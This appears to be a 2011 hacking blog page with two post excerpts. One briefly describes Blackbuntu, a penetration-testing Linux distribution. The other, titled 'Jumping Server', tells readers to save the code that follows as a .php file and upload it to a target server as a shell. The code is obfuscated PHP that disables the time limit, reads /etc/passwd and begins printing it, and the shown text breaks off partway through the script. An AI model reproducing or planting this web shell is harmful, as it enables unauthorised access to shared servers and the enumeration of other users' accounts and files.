Thursday, January 27, 2011

OS : Blackbuntu

Blackbuntu is distribution for penetration testing which was specially designed for security training students and practitioners of information security. Blackbuntu is penetration testing distribution with GNOME Desktop Environment. It's currently being built using the Ubuntu 10.10 and work on reference Back|Track. It's created as a hobby. Jagan nakal-nakal.. ;D Downl...

Jumping Server

Jumping Server..just copy n paste it to notepad..Save it as *.phpThen upload to the target box.. (mcm upload shell la).. Then don't nakal2.. ;D------------------code------------------<? $x15="\x61rray\137\x70\165\x73h"; $x16="f\x65\157\146"; $x17="fgets"; $x18="\146\x6f\160\145\156"; $x19="in\x69\137g\145\164"; $x1a="is\x5f\x72\145ad\141b\154e"; $x1b="\x73\x65t_t\151\155\x65\137li\155\x69t"; $x1c="\x73\x74\162\x70\157\163"; $x1d="\163\165b\x73t\x72"; ($x0b = $x19('safe_mode') == 0) ? $x0b = 'off': die('<b>Error: Safe Mode is On</b>');$x1b(0);@$x0c = $x18('/etc/passwd','r');if (!$x0c) { die('<b> Error : Can Not Read Config Of Server </b>'); }$x0d = array();$x0e = array();$x0f = array();$x10 = 0;echo "\074b>\x3cfo\x6e\x74\040fa\x63\x65=\126\x65\x72\x64an\141\x20s\151\x7a\x65\075\x33...

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